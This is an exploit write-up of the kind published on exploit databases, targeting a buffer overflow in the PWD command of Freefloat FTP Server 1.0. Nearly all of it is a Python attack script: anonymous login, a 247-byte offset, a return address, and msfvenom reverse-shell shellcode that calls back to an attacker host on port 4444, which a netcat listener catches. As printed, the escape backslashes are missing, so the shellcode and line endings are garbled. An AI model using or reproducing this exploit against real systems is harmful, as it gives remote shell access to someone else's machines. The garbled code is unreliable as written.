Authored by Waqas Ahmed Faroouqi

Freefloat FTP Server version 1.0 suffers from a remote buffer overflow vulnerability.

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3


#!/usr/bin/python

import socket

#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b 'x00x0d'

#nc -lvp 4444
#Send exploit


#offset = 247
#badchars=x00x0d
#return_address=x3bx69x5ax77 (ole32.dll)

payload = (
"xb8xf3x93x2ex96xdbxcaxd9x74x24xf4x5bx31xc9"
"xb1x52x31x43x12x83xebxfcx03xb0x9dxccx63xca"
"x4ax92x8cx32x8bxf3x05xd7xbax33x71x9cxedx83"
"xf1xf0x01x6fx57xe0x92x1dx70x07x12xabxa6x26"
"xa3x80x9bx29x27xdbxcfx89x16x14x02xc8x5fx49"
"xefx98x08x05x42x0cx3cx53x5fxa7x0ex75xe7x54"
"xc6x74xc6xcbx5cx2fxc8xeaxb1x5bx41xf4xd6x66"
"x1bx8fx2dx1cx9ax59x7cxddx31xa4xb0x2cx4bxe1"
"x77xcfx3ex1bx84x72x39xd8xf6xa8xccxfax51x3a"
"x76x26x63xefxe1xadx6fx44x65xe9x73x5bxaax82"
"x88xd0x4dx44x19xa2x69x40x41x70x13xd1x2fxd7"
"x2cx01x90x88x88x4ax3dxdcxa0x11x2ax11x89xa9"
"xaax3dx9axdax98xe2x30x74x91x6bx9fx83xd6x41"
"x67x1bx29x6ax98x32xeex3exc8x2cxc7x3ex83xac"
"xe8xeax04xfcx46x45xe5xacx26x35x8dxa6xa8x6a"
"xadxc9x62x03x44x30xe5xecx31xa8x73x84x43xcc"
"x6ax09xcdx2axe6xa1x9bxe5x9fx58x86x7dx01xa4"
"x1cxf8x01x2ex93xfdxccxc7xdexedxb9x27x95x4f"
"x6fx37x03xe7xf3xaaxc8xf7x7axd7x46xa0x2bx29"
"x9fx24xc6x10x09x5ax1bxc4x72xdexc0x35x7cxdf"
"x85x02x5axcfx53x8axe6xbbx0bxddxb0x15xeaxb7"
"x72xcfxa4x64xddx87x31x47xdexd1x3dx82xa8x3d"
"x8fx7bxedx42x20xecxf9x3bx5cx8cx06x96xe4xac"
"xe4x32x11x45xb1xd7x98x08x42x02xdex34xc1xa6"
"x9fxc2xd9xc3x9ax8fx5dx38xd7x80x0bx3ex44xa0"
"x19")

shellcode = 'A' * 247 + "x3bx69x5ax77" + 'x90' * 10 + payload

def main():
ip = '192.168.146.135'
port = 21

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))

sock.recv(1024)
sock.send('USER anonymousrn')
sock.recv(1024)
sock.send('PASS anonymousrn')
sock.recv(1024)
sock.send('pwd ' + shellcode + 'rn')
sock.close()

if __name__ == '__main__':
main()